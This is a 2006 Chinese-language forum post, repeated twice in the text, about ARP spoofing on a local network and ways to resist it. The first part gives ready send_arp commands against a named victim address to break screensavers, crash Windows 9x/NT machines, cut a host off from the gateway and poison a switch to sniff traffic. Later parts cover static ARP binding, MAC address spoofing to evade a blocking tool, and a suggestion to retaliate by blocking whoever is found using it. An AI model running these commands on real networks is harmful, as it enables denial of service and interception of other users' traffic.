史萊姆論壇 - 查看單個文章

psac · 2006-07-14, 03:22 AM

網上關於ARP的資料已經很多了，就不用我都說了。
用某一位高手的話來說，「我們能做的事情很多，唯一受
限制的是我們的創造力和想像力」。
ARP也是如此。
以下討論的電腦有:

一個要攻擊的電腦：10.5.4.178
硬體位址：52:54:4C:98:EE:2F
我的電腦： :10.5.3.69
硬體位址：52:54:4C:98:ED:C5
網路閘道器： 10.5.0.3
硬體位址：00:90:26:3D:0C:F3
一台交換機另一連接阜的電腦：10.5.3.3
硬體位址：52:54:4C:98:ED:F7
一: 用ARP破WINDOWS的瑩幕保護程式
原理：利用IP衝突的級別比瑩幕保護程式高，當有衝突時，就會
跳出瑩幕保護程式。
關鍵: ARP包的數量適當。
[root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 /
10.5.4.178 52:54:4C:98:EE:2F 40

二：用ARP導致IP衝突，當機
原理：WINDOWS 9X，NT4在處理IP衝突時，處理不過來，導致當機。
註：對WINDOWS 2K，LINUX相當於flooding,只是比一般的FLOODING
有效的多.對LINUX，明顯系統被拖慢。
[root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 /
10.5.4.178 52:54:4C:98:EE:2F 999999999

三：用ARP欺騙網路閘道器，可導致局域網的某台電腦出不了網路閘道器。
原理: 用ARP應答包去重新整理對應著要使之出不去的電腦。
[root@sztcww tools]# ./send_arp 10.5.4.178 52:54:4C:98:EE:22 /
10.5.4.178 00:90:26:3D:0C:F3 1
注意：如果單單如上的命令，大概只能有效幾秒鐘，網路閘道器電腦裡的ARP
高速快取記憶體會被被攻擊的電腦正確重新整理，於是只要...

四：用ARP欺騙交換機，可監聽到交換機另一端的電腦。
可能需要修改一下send_arp.C , 構造如下的資料包。
ethhdr
srchw:52:54:4C:98:ED:F7--->dsthw:FF:FF:FF:FF:FF:FF proto:806H
arphdr
hwtype:1 protol:800H hw_size:6 pro_size:4 op:1
s_ha:52:54:4C:98:ED:F7 s_ip:10.5.3.3
d_ha:00:00:00:00:00:00 d_ip:10.5.3.3
然後就可以sniffer了。
原理:
交換機是具有記憶MAC卡位址功能的 , 它維護一張MAC卡位址和它的口號表
所以你可以先來個ARP 欺騙, 然後就可以監聽了
不過需要指出 , 欺騙以後, 同一個MAC卡位址就有兩個連接阜號
yuange說，「這樣其實就是一個競爭問題。」
好像ARP 以後, 對整個網路會有點影響, 不過我不敢確定
既然是競爭 , 所以監聽也只能監聽一部分, 不像同一HUB下的監聽。
對被監聽者會有影響，因為他掉了一部分資料。
當然還有其他一些應用，需要其他技術的配合。

解決方法:
方法一:
網段A(192.168.0.x) 通過------> 網路閘道服務器（192.168.0.1；192.168.10.1） -----〉
和網段B（192.168.10.x)通信。
假設架設 CS服務器在網段B 192.168.10.88 機器上，
現在在網路閘道服務器上架著一個連接阜轉發程式（有很多的自己找）
比如定義網路閘道服務器的27015連接阜轉發指定 192.168.0.10.88 的27015連接阜
現在在網段A(192.168.0.x) 的玩家只要的互連網遊戲地址處加入 192.168.0.1:27015 就可以找到
192.168.10.88 的CS服務器了
個人認為比較好的辦法是把網段分開，在網路閘道服務器上做連接阜轉發服務
來達到共享CS服務器等功能，就可以解決了~
方法二:
捆綁MAC和IP位址杜絕IP位址盜用現象
到代理服務器端讓網路管理員把您上網的靜態IP位址與所記錄電腦的網卡地址進行捆綁。具體命令是:
　　ARP -s 192.168.0.4 00-EO-4C-6C-08-75
　　這樣，就將您上網的靜態IP位址192.168.0.4與網卡地址為00-EO-4C-6C-08-75的電腦綁定在一起了，即使別人盜用您的IP位址192.168.0.4也無法通過代理服務器上網。其中應注意的是此項命令僅在局域網中上網的代理服務器端有用，還要是靜態IP位址，像一般的Modem撥號上網是動態IP位址就不起作用。接下來我們對各參數的功能作一些簡單的介紹：

ARP -s - d - a
　　-s——將相應的IP位址與物理位址的捆綁。
　　-d——刪除所給出的IP位址與物理位址的捆綁。
　　-a——通過查詢Arp協議表來顯示IP位址和對應物理位址情況。
方法三:
網路執法官這個軟件相信大家都聽說過了。功能不錯，可以禁止局域網任意機器連接網路。這個功能對網管來說的確不錯。不過如果這個軟件落到那些卑鄙小人的手裡---那後果就不堪設想了。輕則把你封了上不了網，重則可以導致整個局域網癱瘓。。

廢話不說了，切入正題吧。現在教大家兩招輕鬆防範網路執法官！！
NO 0.1
首先呢，最穩妥的一個辦法就是修改機器的MAC卡位址，只要把MAC卡位址改為別的，就可以欺騙過網路執法官，從而達到突破封鎖的目的。下面是修改MAC卡位址的方法：

linux環境下:
需要用
#ifconfig eth0 down
先把網卡禁用
再用ifconfig eth0 hw ether 1234567890ab
這樣就可以改成功了
要想永久改就這樣
在/etc/rc.d/rc.local裡加上這三句(也可以在/etc/init.d/network裡加下面三行)
ifconfig eth0 down
ifconfig eth0 hw ether 1234567890ab
ifconfig eth0 up
另:
在win2000中改MAC卡位址的方法:
打開註冊表編輯器，找到HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Class/{4D36E972-E325-11CE-BFC1-08002BE10318}子鍵，在該子鍵下的0000，0001，0002等分支中查找DriverDesc，在0000子鍵下天一個字元串項，命名為NetworkAddress，鍵值設為修改後的MAC卡位址，要求為連續的12個16進制數，如1234567890AB(注意位數要對！不能是000000000000，不能與別的機器重複)。然後在0000下的NDI/params中加一項名為NetworkAddress的子鍵，在該子鍵下新增名為defau

lt的字元串，鍵值為修改後的MAC卡位址，與上面的數值相同。在NetworkAddress的主鍵下繼續新增命名為ParamDesc的字元串，其作用是制定NetworkAddress主鍵的描述，其值可為「MAC
地址」，這樣以後打開網路內容，雙擊相應的網卡會發現有一個高階設置，其下坐在「MAC卡位址」的選項，在此修改MAC卡位址就可以了，修改後需重啟。

Windows環境:
用dos，8139的可以改，用realtek的pg8139.exe,比如
是8139c網卡，就改寫8139c.cfg文件，第一行就是網卡mac,想怎麼改就怎麼改
NO 0.2
另外一種方法，我沒有試，一種設想，有條件的朋友幫忙試一下。
由於網路執法官的原理是通過ARP欺騙發給被攻擊的電腦一個假的網路閘道器IP位址對應的MAC，使其找不到網路閘道器真正的MAC，那麼我們可以自己修改IP->MAC的映射，使網路執法官ARP欺騙失效。具體做法如下：

在還沒有被封鎖的時候進入CMD執行如下命令
e:/>ping 192.168.9.1 (假設此地址位網路閘道器。)
Pinging 192.168.9.1 with 32 bytes of data:
Reply from 192.168.9.1: bytes=32 time<10ms TTL=64
Reply from 192.168.9.1: bytes=32 time<10ms TTL=64
Reply from 192.168.9.1: bytes=32 time<10ms TTL=64
Reply from 192.168.9.1: bytes=32 time<10ms TTL=64
Ping statistics for 192.168.9.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
e:/>arp -a
Interface: 192.168.9.1 on Interface 0x5000003
Internet Address Physical Address Type
192.168.9.1 00-0E-70-32-f1-02 dynamic
(上面的就是網路閘道器的MAC)
然後作這樣一個批處理文件儲存起來。。注意！！！地址要換為你自己的網路閘道器的IP和MAC
arp -s 192.168.9.1 00-0E-70-32-f1-02
然後呢，在你被封鎖的時候，就執行這個批處理吧。
NO 0.3
如果解除了網路執法官的封鎖可不可以查到使用網路執法官的人究竟是誰呢?答案是可以！(感謝zva提供方法)利用arpkiller的sniffer殺手掃瞄整個局域網IP段查找處在「混雜」(監聽)模式下的電腦，應該就是他了！！！(注意，掃瞄的時候自己也處在混雜模式，自己不能算哦)

之後做什麼呢？就不用我說了吧？哈哈，以毒攻毒，用網路執法官把她封了！

2006-07-14, 03:22 AM	#1
psac 榮譽會員榮譽勳章勳章總數19 UID - 3662 在線等級: 註冊日期: 2002-12-07 住址: 木柵市立動物園文章: 17381 精華: 2 現金: 5253 金幣資產: 33853 金幣	局域網攻擊原理與防禦(網路執法官類) 網上關於ARP的資料已經很多了，就不用我都說了。用某一位高手的話來說，「我們能做的事情很多，唯一受限制的是我們的創造力和想像力」。 ARP也是如此。以下討論的電腦有: 一個要攻擊的電腦：10.5.4.178 硬體位址：52:54:4C:98:EE:2F 我的電腦： :10.5.3.69 硬體位址：52:54:4C:98:ED:C5 網路閘道器： 10.5.0.3 硬體位址：00:90:26:3D:0C:F3 一台交換機另一連接阜的電腦：10.5.3.3 硬體位址：52:54:4C:98:ED:F7 一: 用ARP破WINDOWS的瑩幕保護程式原理：利用IP衝突的級別比瑩幕保護程式高，當有衝突時，就會跳出瑩幕保護程式。關鍵: ARP包的數量適當。 [root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 / 10.5.4.178 52:54:4C:98:EE:2F 40 二：用ARP導致IP衝突，當機原理：WINDOWS 9X，NT4在處理IP衝突時，處理不過來，導致當機。註：對WINDOWS 2K，LINUX相當於flooding,只是比一般的FLOODING 有效的多.對LINUX，明顯系統被拖慢。 [root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 / 10.5.4.178 52:54:4C:98:EE:2F 999999999 三：用ARP欺騙網路閘道器，可導致局域網的某台電腦出不了網路閘道器。原理: 用ARP應答包去重新整理對應著要使之出不去的電腦。 [root@sztcww tools]# ./send_arp 10.5.4.178 52:54:4C:98:EE:22 / 10.5.4.178 00:90:26:3D:0C:F3 1 注意：如果單單如上的命令，大概只能有效幾秒鐘，網路閘道器電腦裡的ARP 高速快取記憶體會被被攻擊的電腦正確重新整理，於是只要... 四：用ARP欺騙交換機，可監聽到交換機另一端的電腦。可能需要修改一下send_arp.C , 構造如下的資料包。 ethhdr srchw:52:54:4C:98:ED:F7--->dsthw:FF:FF:FF:FF:FF:FF proto:806H arphdr hwtype:1 protol:800H hw_size:6 pro_size:4 op:1 s_ha:52:54:4C:98:ED:F7 s_ip:10.5.3.3 d_ha:00:00:00:00:00:00 d_ip:10.5.3.3 然後就可以sniffer了。原理: 交換機是具有記憶MAC卡位址功能的 , 它維護一張MAC卡位址和它的口號表所以你可以先來個ARP 欺騙, 然後就可以監聽了不過需要指出 , 欺騙以後, 同一個MAC卡位址就有兩個連接阜號 yuange說，「這樣其實就是一個競爭問題。」好像ARP 以後, 對整個網路會有點影響, 不過我不敢確定既然是競爭 , 所以監聽也只能監聽一部分, 不像同一HUB下的監聽。對被監聽者會有影響，因為他掉了一部分資料。當然還有其他一些應用，需要其他技術的配合。解決方法: 方法一: 網段A(192.168.0.x) 通過------> 網路閘道服務器（192.168.0.1；192.168.10.1） -----〉和網段B（192.168.10.x)通信。假設架設 CS服務器在網段B 192.168.10.88 機器上，現在在網路閘道服務器上架著一個連接阜轉發程式（有很多的自己找）比如定義網路閘道服務器的27015連接阜轉發指定 192.168.0.10.88 的27015連接阜現在在網段A(192.168.0.x) 的玩家只要的互連網遊戲地址處加入 192.168.0.1:27015 就可以找到 192.168.10.88 的CS服務器了個人認為比較好的辦法是把網段分開，在網路閘道服務器上做連接阜轉發服務來達到共享CS服務器等功能，就可以解決了~ 方法二: 捆綁MAC和IP位址杜絕IP位址盜用現象到代理服務器端讓網路管理員把您上網的靜態IP位址與所記錄電腦的網卡地址進行捆綁。具體命令是: 　　ARP -s 192.168.0.4 00-EO-4C-6C-08-75 　　這樣，就將您上網的靜態IP位址192.168.0.4與網卡地址為00-EO-4C-6C-08-75的電腦綁定在一起了，即使別人盜用您的IP位址192.168.0.4也無法通過代理服務器上網。其中應注意的是此項命令僅在局域網中上網的代理服務器端有用，還要是靜態IP位址，像一般的Modem撥號上網是動態IP位址就不起作用。接下來我們對各參數的功能作一些簡單的介紹： ARP -s - d - a 　　-s——將相應的IP位址與物理位址的捆綁。　　-d——刪除所給出的IP位址與物理位址的捆綁。　　-a——通過查詢Arp協議表來顯示IP位址和對應物理位址情況。方法三: 網路執法官這個軟件相信大家都聽說過了。功能不錯，可以禁止局域網任意機器連接網路。這個功能對網管來說的確不錯。不過如果這個軟件落到那些卑鄙小人的手裡---那後果就不堪設想了。輕則把你封了上不了網，重則可以導致整個局域網癱瘓。。廢話不說了，切入正題吧。現在教大家兩招輕鬆防範網路執法官！！ NO 0.1 首先呢，最穩妥的一個辦法就是修改機器的MAC卡位址，只要把MAC卡位址改為別的，就可以欺騙過網路執法官，從而達到突破封鎖的目的。下面是修改MAC卡位址的方法： linux環境下: 需要用 #ifconfig eth0 down 先把網卡禁用再用ifconfig eth0 hw ether 1234567890ab 這樣就可以改成功了要想永久改就這樣在/etc/rc.d/rc.local裡加上這三句(也可以在/etc/init.d/network裡加下面三行) ifconfig eth0 down ifconfig eth0 hw ether 1234567890ab ifconfig eth0 up 另: 在win2000中改MAC卡位址的方法: 打開註冊表編輯器，找到HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Class/{4D36E972-E325-11CE-BFC1-08002BE10318}子鍵，在該子鍵下的0000，0001，0002等分支中查找DriverDesc，在0000子鍵下天一個字元串項，命名為NetworkAddress，鍵值設為修改後的MAC卡位址，要求為連續的12個16進制數，如1234567890AB(注意位數要對！不能是000000000000，不能與別的機器重複)。然後在0000下的NDI/params中加一項名為NetworkAddress的子鍵，在該子鍵下新增名為defau lt的字元串，鍵值為修改後的MAC卡位址，與上面的數值相同。在NetworkAddress的主鍵下繼續新增命名為ParamDesc的字元串，其作用是制定NetworkAddress主鍵的描述，其值可為「MAC 地址」，這樣以後打開網路內容，雙擊相應的網卡會發現有一個高階設置，其下坐在「MAC卡位址」的選項，在此修改MAC卡位址就可以了，修改後需重啟。 Windows環境: 用dos，8139的可以改，用realtek的pg8139.exe,比如是8139c網卡，就改寫8139c.cfg文件，第一行就是網卡mac,想怎麼改就怎麼改 NO 0.2 另外一種方法，我沒有試，一種設想，有條件的朋友幫忙試一下。由於網路執法官的原理是通過ARP欺騙發給被攻擊的電腦一個假的網路閘道器IP位址對應的MAC，使其找不到網路閘道器真正的MAC，那麼我們可以自己修改IP->MAC的映射，使網路執法官ARP欺騙失效。具體做法如下：在還沒有被封鎖的時候進入CMD執行如下命令 e:/>ping 192.168.9.1 (假設此地址位網路閘道器。) Pinging 192.168.9.1 with 32 bytes of data: Reply from 192.168.9.1: bytes=32 time<10ms TTL=64 Reply from 192.168.9.1: bytes=32 time<10ms TTL=64 Reply from 192.168.9.1: bytes=32 time<10ms TTL=64 Reply from 192.168.9.1: bytes=32 time<10ms TTL=64 Ping statistics for 192.168.9.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms e:/>arp -a Interface: 192.168.9.1 on Interface 0x5000003 Internet Address Physical Address Type 192.168.9.1 00-0E-70-32-f1-02 dynamic (上面的就是網路閘道器的MAC) 然後作這樣一個批處理文件儲存起來。。注意！！！地址要換為你自己的網路閘道器的IP和MAC arp -s 192.168.9.1 00-0E-70-32-f1-02 然後呢，在你被封鎖的時候，就執行這個批處理吧。 NO 0.3 如果解除了網路執法官的封鎖可不可以查到使用網路執法官的人究竟是誰呢?答案是可以！(感謝zva提供方法)利用arpkiller的sniffer殺手掃瞄整個局域網IP段查找處在「混雜」(監聽)模式下的電腦，應該就是他了！！！(注意，掃瞄的時候自己也處在混雜模式，自己不能算哦) 之後做什麼呢？就不用我說了吧？哈哈，以毒攻毒，用網路執法官把她封了！此帖於 2006-07-14 03:53 AM 被 psac 編輯.
	__________________
	送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次